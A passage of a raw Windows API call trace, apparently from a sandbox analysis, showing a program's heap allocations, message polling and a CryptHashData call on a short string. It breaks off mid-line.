1 [0205.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0205.378] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0205.378] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0205.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0205.378] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54d28 [0205.378] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0205.378] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0205.379] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0205.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0205.379] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54e58, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0205.379] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0205.379] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0205.379] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0205.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0205.379] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0205.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0205.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54e68 [0205.379] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0205.379] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0205.379] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977bd8 | out: hHeap=0x970000) returned 1 [0205.379] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699e8 | out: hHeap=0x970000) returned 1 [0205.379] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0205.379] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0205.379] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0205.379] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0205.379] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0205.379] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0205.379] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0205.379] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0205.379] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0205.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0205.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0205.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0205.380] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0205.380] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0205.380] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0205.380] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0205.380] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80178 | out: hHeap=0x970000) returned 1 [0205.380] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0205.380] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50758 [0205.380] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0205.380] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0205.380] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0205.380] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0205.380] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0205.380] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0205.380] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0205.380] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0205.380] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0205.380] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0205.380] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0205.380] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0205.380] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0205.380] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0205.380] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0205.380] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0205.380] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0205.380] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0205.380] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0205.380] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0205.380] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0205.381] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0205.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0205.381] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0205.381] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0205.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0205.381] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0205.381] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0205.381] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0205.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0205.381] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0205.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0205.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0205.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0205.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0205.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0205.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0205.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977bd8 | out: hHeap=0x970000) returned 1 [0205.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0205.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0205.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0205.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0205.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0205.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0205.382] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0205.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0205.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0205.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0205.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0205.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0205.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0205.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0205.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0205.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0205.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0205.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0205.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0205.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0205.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0205.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0205.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0205.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0205.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0205.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0205.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0205.382] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0205.382] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2e50ae8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0205.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0205.383] GetProcAddress (hModule=0x756e0000, lpProcName="CryptHashData") returned 0x756feef0 [0205.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0205.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0205.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0205.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0205.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0205.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0205.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0205.383] CryptHashData (hHash=0xa87490, pbData=0x2e54d48, dwDataLen=0x3, dwFlags=0x1) returned 1 [0205.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0205.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0205.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0205.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0205.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0205.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0205.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0205.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0205.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0205.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0205.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0205.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0205.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0205.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0205.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0205.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0205.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0205.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0205.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0205.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0205.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0205.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0205.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0205.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0205.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0205.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0205.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0205.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0205.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0205.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0205.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0205.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0205.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0205.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0205.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977998 | out: hHeap=0x970000) returned 1 [0205.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b68 | out: hHeap=0x970000) returned 1 [0205.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0205.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0205.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0205.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0205.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0205.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0205.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0205.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0205.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0205.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0205.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0205.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0205.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0205.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0205.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0205.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0205.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0205.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0205.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0205.385] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0205.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0205.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0205.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0205.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a68 [0205.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0205.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0205.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0205.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0205.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0205.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0205.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0205.386] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0205.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0205.386] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0205.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0205.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0205.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0205.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0205.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fff0 [0205.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0205.386] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0205.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fff0 | out: hHeap=0x970000) returned 1 [0205.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0205.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50b18 [0205.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0205.386] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0205.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0205.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0205.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0205.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0205.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0205.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0205.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0205.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0205.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0205.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0205.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0205.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0205.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0205.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0205.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0205.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0205.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0205.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0205.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0205.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0205.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0205.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0205.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0205.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54508 [0205.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0205.387] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0205.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54508 | out: hHeap=0x970000) returned 1 [0205.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0205.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50bd8 [0205.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0205.388] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0205.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0205.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 